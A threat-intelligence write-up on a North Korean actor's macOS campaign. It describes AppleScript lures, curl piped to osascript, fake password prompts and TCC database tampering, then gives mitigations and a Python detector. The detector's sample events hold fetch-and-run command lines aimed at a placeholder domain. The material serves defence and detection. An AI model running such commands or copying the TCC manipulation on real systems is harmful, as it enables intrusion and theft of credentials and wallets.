Technical Analysis: Sapphire Sleet’s Cascading AppleScript Payload Chain on macOS

Recent threat intelligence has uncovered a sophisticated macOS campaign attributed to the North Korean actor Sapphire Sleet. The campaign leverages highly crafted .scpt (AppleScript) lure files to execute a multi-stage, memory-resident payload chain. By utilizing a curl to osascript piping mechanism, the attackers are able to execute malicious logic entirely within the context of the macOS Script Editor, effectively bypassing traditional perimeter and endpoint protections.

The Initial Infection Vector: Social Engineering via Script Editor

The attack lifecycle begins with social engineering, where victims are prompted to download files masquerading as critical software updates or SDKs—such as Zoom SDK Update.scpt or msteams sdk update.scpt. When these files are opened, they appear legitimate to the untrained eye. The script is engineered to display an extensive block of benign-looking comments in the Script Editor, pushing the actual malicious instructions below the visible fold of the editor window.

Once the user initiates execution, the script invokes curl to fetch remote stages from a command-and-control (C2) server. Crucially, the output is piped directly into osascript (e.g., curl [URL] | osascript). This “fileless” approach allows the malware to trigger cascading execution stages—downloading components, registering the host with the C2, and deploying backdoors—without ever writing the initial stages to the physical disk.

This curl → osascript chaining provides several distinct operational advantages:

  • Bypassing Security Checks: By executing within the user-initiated context of Script Editor, the activity sidesteps Gatekeeper, notarization requirements, and macOS quarantine checks.
  • Dynamic Payload Delivery: The attackers use distinct User-Agent identifiers (ranging from mac-cur1 through mac-cur5) to facilitate per-stage payload selection, allowing them to tailor the infection based on the victim’s environment.

Payload Evolution and Persistence

The campaign utilizes a modular architecture to achieve its objectives. According to Microsoft Threat Intelligence, the various stages serve specific roles:

  • Stage mac-cur1: Functions as an orchestrator and deploys a host monitoring component, often observed under the guise of legitimate-sounding names like com.apple.cli or com.microsoft.helper.
  • Persistence: A dedicated services backdoor installs itself via launchd property lists (plists) to ensure survival across reboots.
  • Credential Harvesting (mac-cur2/mac-cur4): These stages deploy a malicious application named systemupdate.app. This app presents a native-looking macOS password prompt to the user. Once the user enters their credentials, the app exfiltrates them to the attacker via the Telegram Bot API.

TCC Manipulation and Data Exfiltration

To escalate privileges and access sensitive user data, Sapphire Sleet has developed methods to subvert macOS Transparency, Consent, and Control (TCC) protections. The malware programmatically manipulates the TCC database to grant itself unauthorized permissions.

The technique involves coercing the Finder process to allow read/write access to the TCC folder. The actors then use sqlite3 to inject AppleEvents grants for osascript into the TCC database, specifically targeting entries that satisfy Apple’s code-signing requirements. Once the modified database is put back in place, osascript silently holds the high-level AppleEvents privileges required for deep file-system automation.

With TCC bypassed, the malware conducts an extensive sweep of high-value artifacts, including:

  • Browser profiles and IndexedDB wallet data.
  • Keychain files (which can be decrypted using the stolen user password).
  • Telegram session data and SSH keys.
  • Cryptocurrency wallet files (e.g., Ledger Live, Exodus).
  • Apple Notes and system logs.

Data is exfiltrated through uploads launched under nohup, with consistent upload headers tied to a unique device UUID that lets the operators track individual victims.

Mitigation and Defensive Posture

In response to this campaign, Apple has deployed updated XProtect signatures and enhanced Safe Browsing protections. Simultaneously, Microsoft has expanded Microsoft Defender detections and released specific hunting queries to identify suspicious piped executions.

Recommended Security Controls:

  1. Audit Scripting Activity: Monitor and, where possible, restrict the execution of unsigned .scpt files.
  2. Monitor Interpreter Piping: Implement alerts for command-line patterns involving curl or wget being piped directly into osascript, bash, or python.
  3. TCC Integrity: Heavily monitor any unauthorized attempts to access or modify Library/Application Support/com.apple.TCC/TCC.db.
  4. Endpoint Hardening: Enforce the principle of least privilege and encourage the use of hardware security keys and hardware wallets for cryptocurrency workflows.
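One way to turn controls 2 and 3 into detection logic, as an added example that is not code from the article, from Apple, or from Microsoft's hunting queries: it tags process command lines that pipe curl/wget straight into an interpreter, that touch TCC.db, or that carry the mac-cur1 to mac-cur5 User-Agent strings described above. The sample command lines are constructed, and example.invalid is a placeholder domain.

```python
import re

# Constructed sample process-execution events (one command line per event),
# in the shape an EDR or unified-log collector might record them.
SAMPLE_EVENTS = [
    "curl -s -A mac-cur1 https://example.invalid/stage | osascript",
    "/usr/bin/curl https://example.invalid/update.sh | /bin/bash",
    'sqlite3 "/Users/alice/Library/Application Support/com.apple.TCC/TCC.db" "select * from access"',
    "curl -o /tmp/file.bin https://example.invalid/file.bin",
    "osascript /Users/alice/Downloads/notes.scpt",
]

DOWNLOADERS = r"(?:curl|wget)\b"
INTERPRETERS = r"(?:osascript|bash|sh|zsh|python3?)\b"

# Rule 1: a downloader whose output is piped *directly* into an interpreter
# (one pipe, optional path prefix on the interpreter). Multi-hop pipes such as
# "curl ... | tee x | osascript" are deliberately out of scope here.
PIPE_RE = re.compile(rf"{DOWNLOADERS}[^|]*\|\s*(?:\S*/)?{INTERPRETERS}")

# Rule 2: any command line that names the per-user TCC database.
TCC_DB_RE = re.compile(r"Library/Application Support/com\.apple\.TCC/TCC\.db")

# Rule 3: the per-stage User-Agent values reported for this campaign.
STAGE_UA_RE = re.compile(r"\bmac-cur[1-5]\b")


def classify(cmd: str) -> list:
    """Return the list of rule tags that match a single command line."""
    tags = []
    if PIPE_RE.search(cmd):
        tags.append("downloader-piped-to-interpreter")
    if TCC_DB_RE.search(cmd):
        tags.append("tcc-db-access")
    if STAGE_UA_RE.search(cmd):
        tags.append("sapphire-sleet-stage-user-agent")
    return tags


def scan(events) -> list:
    """Return (cmd, tags) for every event that triggers at least one rule."""
    hits = []
    for cmd in events:
        tags = classify(cmd)
        if tags:
            hits.append((cmd, tags))
    return hits


if __name__ == "__main__":
    for cmd, tags in scan(SAMPLE_EVENTS):
        print(f"{', '.join(tags)}: {cmd}")
```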

Indicators of Compromise (IoCs)

Malicious File Hashes (SHA-256)

